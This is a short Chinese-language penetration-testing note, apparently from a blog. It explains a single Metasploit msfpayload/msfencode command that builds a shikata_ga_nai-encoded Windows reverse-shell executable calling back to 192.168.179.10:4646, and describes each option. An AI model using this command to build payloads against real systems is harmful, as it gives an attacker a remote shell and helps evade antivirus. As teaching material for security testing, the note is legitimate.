|
利用Metasploit 3.4提供的msfpayload和msfencode可以生成編碼后的exe文件
#msfpayload windows/shell_reverse_tcp LHOST=192.168.179.10 LPORT=4646 r | msfencode -e x86/shikata_ga_nai -t exe -o /home/tangbohu/rtcp.exe
windows/shell_reverse_tcp 就是我們自己需要的payload;
LHOST=192.168.179.10 LPORT=4646 是上面payload需要的選項(xiàng),LHOST表示反向鏈接到的主機(jī)的IP,LPORT表示反向鏈接到的主機(jī)的端口;
r 表示生成raw代碼;
-e x86/shikata_ga_nai 指定需要的encoder;
-t exe 表示生成的是windows下的可執(zhí)行文件;
-o /home/tangbohu/rtcp.exe 指定生成的exe文件保存在哪里。
|
|
|
來(lái)自: 糖伯虎點(diǎn)秋香 > 《滲透測(cè)試》